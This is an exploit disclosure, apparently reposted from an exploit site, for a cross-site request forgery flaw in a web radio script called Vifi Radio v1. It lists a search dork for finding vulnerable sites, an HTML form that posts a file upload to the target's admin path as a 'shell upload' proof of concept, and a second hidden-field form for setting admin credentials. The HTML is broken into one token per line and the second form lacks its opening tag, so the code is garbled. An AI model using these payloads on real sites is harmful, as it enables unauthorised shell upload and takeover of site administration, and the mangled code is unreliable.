Vifi Radio v1 - CSRF Vulnerability
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Vifi Radio
|~Affected Version : v1
|~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html
|~Official Demo : http://radyo.vifibilisim.com
|~RISK : Medium
|~DORK : inurl:index.asp?radyo=2
|~Tested On : [L] Windows 7, Mozilla Firefox
########################################################
Upload.HTML
-----------------------------------------------------------
<
td
width
=
"796"
valign
=
"top"
><
form
name
=
"form1"
method
=
"post"
action
=
"http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56"
enctype
=
"multipart/form-data"
onSubmit
=
"checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG');return document.MM_returnValue"
>
<
table
width
=
"100%"
border
=
"0"
align
=
"center"
cellpadding
=
"0"
cellspacing
=
"0"
>
<
tr
>
<
td
class
=
"baslik"
> CSRF with Tamper Data Shell Upload PoC </
td
>
</
tr
> <
tr
>
<
td
height
=
"125"
align
=
"center"
class
=
"menu"
><
input
type
=
"file"
name
=
"fmfile"
style
=
"width:200px"
class
=
"main"
>
<
input
name
=
"fmsubmit"
type
=
"submit"
class
=
"main"
value
=
"YÜKLE"
/></
td
>
</
tr
>
</
table
>
</
form
></
td
>
</
tr
>
</
table
></
td
>
</
tr
>
----------------------------------------------------------
PoC
----------------------------------------------------------
<
html
>
<
body
>
<
input
type
=
"hidden"
name
=
"rutbe"
value
=
"1"
/>
<
input
type
=
"hidden"
name
=
"djadi"
value
=
"0"
/>
<
input
type
=
"hidden"
name
=
"resim"
value
=
"Vifi+Bili%FEim"
/>
<
input
type
=
"hidden"
name
=
"firma"
value
=
"USERNAME"
/>
<
input
type
=
"hidden"
name
=
"link"
value
=
"PASSWORD"
/>
<
input
type
=
"hidden"
name
=
"sira"
value
=
"23"
/>
<
input
type
=
"hidden"
name
=
"ilet"
value
=
"G%D6NDER"
/>
<
input
type
=
"hidden"
name
=
"Submit"
value
=
"Exploit!"
/>
<
input
type
=
"submit"
value
=
"Submit request"
/>
</
form
>
</
body
>
</
html
>
############################
"Admin Panel: /yonetim "
############################
EXPLOIT: http://0day.today/exploit/24101
ليست هناك تعليقات:
إرسال تعليق